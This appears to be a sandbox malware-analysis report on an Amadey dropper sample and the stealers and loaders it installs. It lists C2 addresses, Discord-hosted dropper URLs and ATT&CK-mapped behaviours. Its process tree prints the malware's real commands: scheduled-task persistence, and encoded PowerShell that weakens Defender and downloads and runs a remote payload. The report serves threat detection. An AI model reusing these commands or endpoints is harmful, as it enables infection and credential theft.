amadey | 3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d

Analysis

max time kernel
300s
max time network
302s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
18/12/2022, 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d.exe
Size

225KB
MD5

6a59c469713da7bb9abc4b8f2e8ac6da
SHA1

e87a23b50b3f3a41c50d62e558153d3a3010a02b
SHA256

3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d
SHA512

16e7c44c8026016439f2c2eac8ae05a7f0ae6115882897d885837a6f5c37c3b19f5cba53202e691a11e632615d921adb50979077d0e50898cce49d2fbe7bca65
SSDEEP

3072:Lz08R/4F+88pD4EkNimqFDF6D2lhPBhQuzpw1H4Oc/1dcK4sRPID6bM0mQt0:x4QRnkgZFDFNPouzpw1H4O9NDCP0

Score

10^/10

amadey aurora dcrat redline smokeloader installs installs1 backdoor collection infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1049569242455998544/1049862157858242560/string4633.err

Extracted

Language

ps1

Source

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1049569242455998544/1049862157594021948/string792.err

Extracted

Family

amadey

Version

3.60

193.42.33.28/game0ver/index.php

Extracted

Family

aurora

45.144.30.146:8081

Extracted

Family

redline

Botnet

installs1

89.23.96.2:7253

Attributes

auth_value
fb538922d8f77f00fb6c39f8066af176

Extracted

Family

redline

Botnet

installs

89.23.96.2:7253

Attributes

auth_value
8d4428f372143572364f044ea9649d7f

Extracted

Family

amadey

Version

3.10

hellomr.observer/f8dfksdj3/index.php

researchersgokick.rocks/f8dfksdj3/index.php

pleasetake.pictures/f8dfksdj3/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

DcRat 6 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

pid	Process
4780	schtasks.exe
212	schtasks.exe
2936	schtasks.exe
5096	schtasks.exe
900	schtasks.exe
1444	schtasks.exe

Detect Amadey credential stealer module 4 IoCs

resource	yara_rule
behavioral2/files/0x0004000000007725-3178.dat	amadey_cred_module
behavioral2/files/0x0004000000007725-3176.dat	amadey_cred_module
behavioral2/files/0x0004000000007725-3174.dat	amadey_cred_module
behavioral2/files/0x0004000000007725-3173.dat	amadey_cred_module

Detects Smokeloader packer 7 IoCs

resource	yara_rule
behavioral2/files/0x0003000000015567-314.dat	family_smokeloader
behavioral2/files/0x0003000000015567-322.dat	family_smokeloader
behavioral2/memory/4272-324-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral2/memory/4272-350-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral2/files/0x000700000001ac29-2782.dat	family_smokeloader
behavioral2/files/0x000700000001ac29-2790.dat	family_smokeloader
behavioral2/memory/2536-2821-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral2/memory/672-825-0x000000000043FE3E-mapping.dmp	family_redline
behavioral2/memory/2288-829-0x0000000000020000-0x00000000000B6000-memory.dmp	family_redline
behavioral2/memory/672-895-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/672-825-0x000000000043FE3E-mapping.dmp	net_reactor
behavioral2/memory/2288-829-0x0000000000020000-0x00000000000B6000-memory.dmp	net_reactor
behavioral2/memory/672-895-0x0000000000400000-0x0000000000454000-memory.dmp	net_reactor

Blocklisted process makes network request 5 IoCs

flow	pid	Process
32	96	powershell.exe
34	5048	powershell.exe
70	1824	rundll32.exe
73	1824	rundll32.exe
75	1824	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 27 IoCs

pid	Process
3668	WinComService.exe
4272	Smoke.exe
4704	minst.exe
444	WinComService.exe
3460	w2wau9l3zz.exe
3428	273F.exe
2288	282A.exe
4624	442F.exe
2512	47E9.exe
4980	52A8.exe
500	MobileTrans2.exe
664	WinComService.exe
4532	MobileTrans.exe
532	MobileTrans2.exe
1104	orxds.exe
1748	WinComService.exe
2536	safbrgj
3216	orxds.exe
3208	WinComService.exe
1336	orxds.exe
3248	orxds.exe
3172	orxds.exe
680	WinComService.exe
3888	MobileTrans.exe
4744	orxds.exe
4668	orxds.exe
800	orxds.exe

Loads dropped DLL 3 IoCs

pid	Process
1824	rundll32.exe
2536	rundll32.exe
5080	rundll32.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Smoke.exe = "C:\\Users\\Admin\\AppData\\Roaming\\1000009050\\Smoke.exe"	WinComService.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 3460 set thread context of 3808	3460	w2wau9l3zz.exe	88
PID 2288 set thread context of 672	2288	282A.exe	98
PID 3428 set thread context of 4532	3428	273F.exe	101
PID 4980 set thread context of 4384	4980	52A8.exe	109
PID 500 set thread context of 532	500	MobileTrans2.exe	122
PID 4532 set thread context of 2164	4532	MobileTrans.exe	126
PID 1104 set thread context of 3216	1104	orxds.exe	128
PID 1336 set thread context of 3248	1336	orxds.exe	141
PID 3888 set thread context of 1364	3888	MobileTrans.exe	149

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
1800	3460	WerFault.exe	86
2748	2288	WerFault.exe	96
2408	3428	WerFault.exe	94
4084	4980	WerFault.exe	104
932	1364	WerFault.exe	149

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Smoke.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Smoke.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Smoke.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	safbrgj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	safbrgj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	safbrgj

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
212	schtasks.exe
2936	schtasks.exe
5096	schtasks.exe
900	schtasks.exe
1444	schtasks.exe
4780	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4272	Smoke.exe
4272	Smoke.exe
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found
2144	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3428	273F.exe
2144	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4272	Smoke.exe
2536	safbrgj

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	436	wmic.exe
Token: SeSecurityPrivilege	436	wmic.exe
Token: SeTakeOwnershipPrivilege	436	wmic.exe
Token: SeLoadDriverPrivilege	436	wmic.exe
Token: SeSystemProfilePrivilege	436	wmic.exe
Token: SeSystemtimePrivilege	436	wmic.exe
Token: SeProfSingleProcessPrivilege	436	wmic.exe
Token: SeIncBasePriorityPrivilege	436	wmic.exe
Token: SeCreatePagefilePrivilege	436	wmic.exe
Token: SeBackupPrivilege	436	wmic.exe
Token: SeRestorePrivilege	436	wmic.exe
Token: SeShutdownPrivilege	436	wmic.exe
Token: SeDebugPrivilege	436	wmic.exe
Token: SeSystemEnvironmentPrivilege	436	wmic.exe
Token: SeRemoteShutdownPrivilege	436	wmic.exe
Token: SeUndockPrivilege	436	wmic.exe
Token: SeManageVolumePrivilege	436	wmic.exe
Token: 33	436	wmic.exe
Token: 34	436	wmic.exe
Token: 35	436	wmic.exe
Token: 36	436	wmic.exe
Token: SeIncreaseQuotaPrivilege	436	wmic.exe
Token: SeSecurityPrivilege	436	wmic.exe
Token: SeTakeOwnershipPrivilege	436	wmic.exe
Token: SeLoadDriverPrivilege	436	wmic.exe
Token: SeSystemProfilePrivilege	436	wmic.exe
Token: SeSystemtimePrivilege	436	wmic.exe
Token: SeProfSingleProcessPrivilege	436	wmic.exe
Token: SeIncBasePriorityPrivilege	436	wmic.exe
Token: SeCreatePagefilePrivilege	436	wmic.exe
Token: SeBackupPrivilege	436	wmic.exe
Token: SeRestorePrivilege	436	wmic.exe
Token: SeShutdownPrivilege	436	wmic.exe
Token: SeDebugPrivilege	436	wmic.exe
Token: SeSystemEnvironmentPrivilege	436	wmic.exe
Token: SeRemoteShutdownPrivilege	436	wmic.exe
Token: SeUndockPrivilege	436	wmic.exe
Token: SeManageVolumePrivilege	436	wmic.exe
Token: 33	436	wmic.exe
Token: 34	436	wmic.exe
Token: 35	436	wmic.exe
Token: 36	436	wmic.exe
Token: SeShutdownPrivilege	2144	Process not Found
Token: SeCreatePagefilePrivilege	2144	Process not Found
Token: SeIncreaseQuotaPrivilege	2816	WMIC.exe
Token: SeSecurityPrivilege	2816	WMIC.exe
Token: SeTakeOwnershipPrivilege	2816	WMIC.exe
Token: SeLoadDriverPrivilege	2816	WMIC.exe
Token: SeSystemProfilePrivilege	2816	WMIC.exe
Token: SeSystemtimePrivilege	2816	WMIC.exe
Token: SeProfSingleProcessPrivilege	2816	WMIC.exe
Token: SeIncBasePriorityPrivilege	2816	WMIC.exe
Token: SeCreatePagefilePrivilege	2816	WMIC.exe
Token: SeBackupPrivilege	2816	WMIC.exe
Token: SeRestorePrivilege	2816	WMIC.exe
Token: SeShutdownPrivilege	2816	WMIC.exe
Token: SeDebugPrivilege	2816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2816	WMIC.exe
Token: SeRemoteShutdownPrivilege	2816	WMIC.exe
Token: SeUndockPrivilege	2816	WMIC.exe
Token: SeManageVolumePrivilege	2816	WMIC.exe
Token: 33	2816	WMIC.exe
Token: 34	2816	WMIC.exe
Token: 35	2816	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1816 wrote to memory of 3668	1816	3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d.exe	66
PID 1816 wrote to memory of 3668	1816	3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d.exe	66
PID 1816 wrote to memory of 3668	1816	3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d.exe	66
PID 3668 wrote to memory of 4780	3668	WinComService.exe	67
PID 3668 wrote to memory of 4780	3668	WinComService.exe	67
PID 3668 wrote to memory of 4780	3668	WinComService.exe	67
PID 3668 wrote to memory of 2360	3668	WinComService.exe	69
PID 3668 wrote to memory of 2360	3668	WinComService.exe	69
PID 3668 wrote to memory of 2360	3668	WinComService.exe	69
PID 2360 wrote to memory of 1492	2360	cmd.exe	71
PID 2360 wrote to memory of 1492	2360	cmd.exe	71
PID 2360 wrote to memory of 1492	2360	cmd.exe	71
PID 2360 wrote to memory of 1176	2360	cmd.exe	72
PID 2360 wrote to memory of 1176	2360	cmd.exe	72
PID 2360 wrote to memory of 1176	2360	cmd.exe	72
PID 2360 wrote to memory of 4804	2360	cmd.exe	73
PID 2360 wrote to memory of 4804	2360	cmd.exe	73
PID 2360 wrote to memory of 4804	2360	cmd.exe	73
PID 2360 wrote to memory of 4520	2360	cmd.exe	75
PID 2360 wrote to memory of 4520	2360	cmd.exe	75
PID 2360 wrote to memory of 4520	2360	cmd.exe	75
PID 2360 wrote to memory of 4512	2360	cmd.exe	74
PID 2360 wrote to memory of 4512	2360	cmd.exe	74
PID 2360 wrote to memory of 4512	2360	cmd.exe	74
PID 2360 wrote to memory of 4212	2360	cmd.exe	76
PID 2360 wrote to memory of 4212	2360	cmd.exe	76
PID 2360 wrote to memory of 4212	2360	cmd.exe	76
PID 3668 wrote to memory of 4272	3668	WinComService.exe	77
PID 3668 wrote to memory of 4272	3668	WinComService.exe	77
PID 3668 wrote to memory of 4272	3668	WinComService.exe	77
PID 3668 wrote to memory of 4704	3668	WinComService.exe	78
PID 3668 wrote to memory of 4704	3668	WinComService.exe	78
PID 3668 wrote to memory of 4704	3668	WinComService.exe	78
PID 4704 wrote to memory of 436	4704	minst.exe	79
PID 4704 wrote to memory of 436	4704	minst.exe	79
PID 4704 wrote to memory of 436	4704	minst.exe	79
PID 4704 wrote to memory of 2408	4704	minst.exe	83
PID 4704 wrote to memory of 2408	4704	minst.exe	83
PID 4704 wrote to memory of 2408	4704	minst.exe	83
PID 2408 wrote to memory of 2816	2408	cmd.exe	85
PID 2408 wrote to memory of 2816	2408	cmd.exe	85
PID 2408 wrote to memory of 2816	2408	cmd.exe	85
PID 3668 wrote to memory of 3460	3668	WinComService.exe	86
PID 3668 wrote to memory of 3460	3668	WinComService.exe	86
PID 3668 wrote to memory of 3460	3668	WinComService.exe	86
PID 3460 wrote to memory of 3808	3460	w2wau9l3zz.exe	88
PID 3460 wrote to memory of 3808	3460	w2wau9l3zz.exe	88
PID 3460 wrote to memory of 3808	3460	w2wau9l3zz.exe	88
PID 3460 wrote to memory of 3808	3460	w2wau9l3zz.exe	88
PID 3460 wrote to memory of 3808	3460	w2wau9l3zz.exe	88
PID 4704 wrote to memory of 3868	4704	minst.exe	91
PID 4704 wrote to memory of 3868	4704	minst.exe	91
PID 4704 wrote to memory of 3868	4704	minst.exe	91
PID 3868 wrote to memory of 4176	3868	cmd.exe	93
PID 3868 wrote to memory of 4176	3868	cmd.exe	93
PID 3868 wrote to memory of 4176	3868	cmd.exe	93
PID 2144 wrote to memory of 3428	2144	Process not Found	94
PID 2144 wrote to memory of 3428	2144	Process not Found	94
PID 2144 wrote to memory of 3428	2144	Process not Found	94
PID 2144 wrote to memory of 2288	2144	Process not Found	96
PID 2144 wrote to memory of 2288	2144	Process not Found	96
PID 2144 wrote to memory of 2288	2144	Process not Found	96
PID 2288 wrote to memory of 672	2288	282A.exe	98
PID 2288 wrote to memory of 672	2288	282A.exe	98

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d.exe
"C:\Users\Admin\AppData\Local\Temp\3d21285ae1a22e1954c31393ce1a7238054d9a78b5ec7560235261cb99df918d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1816
- C:\Users\Admin\AppData\Local\Temp\a4e2bd6d47\WinComService.exe
  "C:\Users\Admin\AppData\Local\Temp\a4e2bd6d47\WinComService.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN WinComService.exe /TR "C:\Users\Admin\AppData\Local\Temp\a4e2bd6d47\WinComService.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "WinComService.exe" /P "Admin:N"&&CACLS "WinComService.exe" /P "Admin:R" /E&&echo Y|CACLS "..\a4e2bd6d47" /P "Admin:N"&&CACLS "..\a4e2bd6d47" /P "Admin:R" /E&&Exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:1492
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "WinComService.exe" /P "Admin:N"
      4⤵
      PID:1176
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "WinComService.exe" /P "Admin:R" /E
      4⤵
      PID:4804
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\a4e2bd6d47" /P "Admin:N"
      4⤵
      PID:4512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:4520
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\a4e2bd6d47" /P "Admin:R" /E
      4⤵
      PID:4212
- - C:\Users\Admin\AppData\Roaming\1000009050\Smoke.exe
    "C:\Users\Admin\AppData\Roaming\1000009050\Smoke.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:4272
- - C:\Users\Admin\AppData\Local\Temp\1000012001\minst.exe
    "C:\Users\Admin\AppData\Local\Temp\1000012001\minst.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:436
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /C "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2408
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2816
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /C "wmic cpu get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3868
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic cpu get name
        5⤵
        
        PID:4176
- - C:\Users\Admin\AppData\Local\Temp\1000013001\w2wau9l3zz.exe
    "C:\Users\Admin\AppData\Local\Temp\1000013001\w2wau9l3zz.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3460
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:3808
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 496
      4⤵
      Program crash
      PID:1800

C:\Users\Admin\AppData\Local\Temp\a4e2bd6d47\WinComService.exe
C:\Users\Admin\AppData\Local\Temp\a4e2bd6d47\WinComService.exe
1⤵
- Executes dropped EXE
PID:444

C:\Users\Admin\AppData\Local\Temp\273F.exe
C:\Users\Admin\AppData\Local\Temp\273F.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
PID:3428
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:4532
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 276
  2⤵
  - Program crash
  PID:2408

C:\Users\Admin\AppData\Local\Temp\282A.exe
C:\Users\Admin\AppData\Local\Temp\282A.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:672
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 512
  2⤵
  - Program crash
  PID:2748

C:\Users\Admin\AppData\Local\Temp\442F.exe
C:\Users\Admin\AppData\Local\Temp\442F.exe
1⤵
- Executes dropped EXE
PID:4624

C:\Users\Admin\AppData\Local\Temp\47E9.exe
C:\Users\Admin\AppData\Local\Temp\47E9.exe
1⤵
- Executes dropped EXE
PID:2512

C:\Users\Admin\AppData\Local\Temp\52A8.exe
C:\Users\Admin\AppData\Local\Temp\52A8.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4980
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:4384
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 516
  2⤵
  - Program crash
  PID:4084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVwBpAG4AMwAyAC4AUgBlAGcAaQBzAHQAcgB5AF0AOgA6AEMAdQByAHIAZQBuAHQAVQBzAGUAcgAuAE8AcABlAG4AUwB1AGIASwBlAHkAKAAiAFMAbwBmAHQAdwBhAHIAZQBcAEwAbwBnAGkAYwAgAE0AZQBkAGkAYQAgAEUAeABwAGwAbwByAGUAcgAiACkALgBHAGUAdABWAGEAbAB1AGUAKAAkAE4AdQBsAGwAKQApADsAWwBDAC4AQwBsAGEAcwBzADEAXQA6ADoAUgB1AG4AKAApADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIAAiAGUAeABlACIAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAG8AYgBpAGwAZQBUAHIAYQBuAHMALgBlAHgAZQAiACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAIgBNAG8AYgBpAGwAZQBUAHIAYQBuAHMALgBlAHgAZQAiADsAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAYgBhAHQAIgAgACIAYwBtAGQAIgAgACIAZABsAGwAIgA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgAgADsA
1⤵
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVwBpAG4AMwAyAC4AUgBlAGcAaQBzAHQAcgB5AF0AOgA6AEMAdQByAHIAZQBuAHQAVQBzAGUAcgAuAE8AcABlAG4AUwB1AGIASwBlAHkAKAAiAFMAbwBmAHQAdwBhAHIAZQBcAEwAbwBnAGkAYwAgAE0AZQBkAGkAYQAgAEUAeABwAGwAbwByAGUAcgAiACkALgBHAGUAdABWAGEAbAB1AGUAKAAkAE4AdQBsAGwAKQApADsAWwBDAC4AQwBsAGEAcwBzADEAXQA6ADoAUgB1AG4AKAApADsAJABYADYANABpADkAOAA1ADQANQAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATQBvAGIAaQBsAGUAVAByAGEAbgBzAC4AZQByAHIAIgA7ACQAWAA2ADQAaQA5ADgANQA0ADYAIAA9ACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AbwBiAGkAbABlAFQAcgBhAG4AcwAuAGUAeABlACIAOwBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAWAA2ADQAaQA5ADgANQA0ADYAIAAtAFAAYQB0AGgAVAB5ACAATABlAGEAZgApACkAewAgAHQAcgB5ACAAewAkAFgANgA0AGkAOQA4ADUANAA3ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEASABSADAAYwBIAE0ANgBMAHkAOQBqAFoARwA0AHUAWgBHAGwAegBZADIAOQB5AFoARwBGAHcAYwBDADUAagBiADIAMAB2AFkAWABSADAAWQBXAE4AbwBiAFcAVgB1AGQASABNAHYATQBUAEEAMABPAFQAVQAyAE8AVABJADAATQBqAFEAMQBOAFQAawA1AE8ARABVADAATgBDADgAeABNAEQAUQA1AE8ARABZAHkATQBUAFUAMwBPAEQAVQA0AE0AagBRAHkATgBUAFkAdwBMADMATgAwAGMAbQBsAHUAWgB6AFEAMgBNAHoATQB1AFoAWABKAHkAJwApACkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABYADYANABpADkAOAA1ADQANwAgAC0ATwB1AHQAZgBpAGwAZQAgACQAWAA2ADQAaQA5ADgANQA0ADUAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBNAGEAaQBuACgAJABYADYANABpADkAOAA1ADQANgAsACQAWAA2ADQAaQA5ADgANQA0ADUALAAnAEMAbwBuAHYAZQByAHQALgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABYAGkAWgBSAGgAaAB2AGEAUwBJAEUARABqADMAVgA0AGcATwBJAEQAdwBiAEcAOABRAGwAYwBkAEQAQgB2AEgAUwBaAHMAYQBmAHAASQAxADAAbgBqAHkARABIADkAdQBKAEIAbwB2ADgANwBhAFoAYgBjAEEANgBFAFMAWABSAFgAOAB1AEoASgA2AFkAMgBHAFMARQBJADIAUwA0AEkAbQBzAFQAQgBYADAASwBXADAAUwAwAEQAbwBOAHcAcQBRAFMAYQBHAFgAegBrAE8AbgB4AHAAbwAyAFMAaQBJAGoAMwBTAFYAOQBWADQAWQB4AFkASwAxADYAVgBNADMAZgBYADMAaQAzAHcAdgB4AEgARgBZAGoAVQBmAGUAcgB1ADEA